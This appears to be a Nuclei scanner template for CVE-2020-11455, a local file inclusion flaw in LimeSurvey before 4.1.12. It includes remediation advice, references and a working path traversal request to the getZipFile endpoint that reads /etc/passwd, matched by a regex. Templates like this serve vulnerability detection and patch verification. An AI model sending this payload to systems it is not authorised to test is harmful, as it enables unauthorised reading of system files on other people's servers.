45 lines
1.6 KiB
YAML
45 lines
1.6 KiB
YAML
id: CVE-2020-11455
|
|
|
|
info:
|
|
name: LimeSurvey 4.1.11 - Local File Inclusion
|
|
author: daffainfo
|
|
severity: critical
|
|
description: LimeSurvey before 4.1.12+200324 is vulnerable to local file inclusion because it contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.
|
|
remediation: |
|
|
Upgrade to the latest version of LimeSurvey (4.1.12 or higher) which includes a fix for this vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/48297
|
|
- https://github.com/LimeSurvey/LimeSurvey/commit/daf50ebb16574badfb7ae0b8526ddc5871378f1b
|
|
- http://packetstormsecurity.com/files/157112/LimeSurvey-4.1.11-Path-Traversal.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-11455
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2020-11455
|
|
cwe-id: CWE-22
|
|
epss-score: 0.71443
|
|
epss-percentile: 0.97703
|
|
cpe: cpe:2.3:a:limesurvey:limesurvey:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: limesurvey
|
|
product: limesurvey
|
|
tags: cve2020,lfi,edb,packetstorm,cve
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a00473045022100a42e84bc972a184e635272541f340fe7c8af03fa7153f08d5210ef9a4151fa0302203f834ebe69ae6e5ae1065e4181d121defdc9282160eb1fb1372bb02f8aed65bf:922c64590222798bb761d5b6d8e72950
|